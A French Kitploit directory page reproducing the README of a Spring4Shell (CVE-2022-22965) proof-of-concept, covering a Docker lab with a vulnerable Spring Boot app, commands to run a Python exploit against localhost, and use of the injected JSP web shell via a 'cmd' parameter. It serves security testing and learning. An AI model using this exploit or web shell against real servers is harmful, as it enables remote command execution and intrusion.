Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-22965 — Preuve de concept d'exploitation pour CVE-2022-22965 (Spring4Shell) avec une application Spring Boot vulnérable, un script d'exploitation Python et un environnement de laboratoire basé sur Docker pour les tests. | Kitploit
Outils/GitHubGitHub/mariomamo/cve-2022-22965
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubmariomamo/cve-2022-22965

CVE-2022-22965

Preuve de concept d'exploitation pour CVE-2022-22965 (Spring4Shell) avec une application Spring Boot vulnérable, un script d'exploitation Python et un environnement de laboratoire basé sur Docker pour les tests.

Voir le dépôt
511il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

👾 CVE-2022-22965

Ceci est une preuve de concept d'un exploit pour la vulnérabilité CVE-2022-22965 (spring4shell). Il est composé de :

  • Une application Springboot vulnérable ;
  • Un script d'exploit écrit en python ;
  • Une application sûre pour tester que l'exploit ne fonctionne pas ;
  • Un dockerfile pour exécuter l'application vulnérable et tester l'exploit ;

🔧Collaborateurs

  • [🇮🇹] Mario Offertucci ;
  • [🇮🇹] Antonio Donnarumma.

⚙️ Prérequis

  • Docker : Il est utilisé pour exécuter un conteneur tomcat avec l'application Springboot ;
  • Python : Il est utilisé pour exécuter l'exploit ;

1️⃣ Exécution de l'application Springboot

Dans le dossier racine du projet, il y a un Dockerfile qui crée une image tomcat et copie les fichiers vulnerable_app/target/spring4shell.war et safe_app/target/safeapp.war dans le dossier , il vous suffit donc de construire l'image et de démarrer le conteneur.

/usr/local/tomcat/webapps

Construire l'image tomcat

root@kitploit:~
docker build -t cve_2022_22965 .

Démarrer le conteneur

root@kitploit:~
docker run -p 8080:8080 -d --name springshell cve_2022_22965

Vérifier que l'application répond

root@kitploit:~
curl --location --request POST http://localhost:8080/spring4shell/vulnerability/exploit?name=Elliot%20Alderson

Si vous voyez cette réponse

root@kitploit:~
This is Elliot Alderson

Alors l'application est opérationnelle.

2️⃣ Maintenant, vous pouvez exécuter l'exploit

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit

Vous pouvez éventuellement spécifier le nom du fichier jsp injecté, mais ce n'est pas obligatoire. Exemple

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit -f exploit.jsp

Si vous ne spécifiez pas de nom, un nom aléatoire sera généré.

Vous verrez ce qui suit dans le shell de commande
Après l'exploit, vous pouvez également envoyer une commande via une requête HTTP GET

root@kitploit:~
http://localhost:8080/exploit.jsp?pwd=pass&cmd=ls

Vous avez ouvert avec succès un shell sur la machine victime ! amusez-vous bien

Télécharger l’outil